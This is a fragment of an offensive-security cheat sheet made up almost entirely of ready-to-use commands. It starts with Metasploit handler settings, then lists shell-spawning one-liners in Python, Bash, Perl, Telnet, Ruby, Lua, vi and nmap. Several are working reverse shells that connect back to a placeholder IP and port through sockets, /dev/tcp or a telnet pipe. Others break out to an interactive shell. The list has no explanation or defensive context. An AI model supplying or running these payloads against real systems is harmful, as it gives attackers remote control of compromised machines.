  set LHOST <[IP]>
  set LPORT <[PORT]>
  set ExitOnSession false
  exploit -j -z
Shell Spawning
Python:
  python -c 'import pty; pty.spawn("/bin/sh")'
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:
  echo os.system('/bin/bash')
  /bin/sh -i
  exec 5<>/dev/tcp/<[IP]>/<[PORT]>; cat <&5 | while read line; do $line 2>&5 >&5; done
Perl:
  perl -e 'exec "/bin/sh";'
  perl: exec "/bin/sh";
  perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Telnet: mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy
Ruby: ruby: exec "/bin/sh"
Lua: lua: os.execute('/bin/sh')
From inside IRB: exec "/bin/sh"
From inside vi: :!bash
From inside vi: :set shell=/bin/bash then :shell
From inside nmap: !sh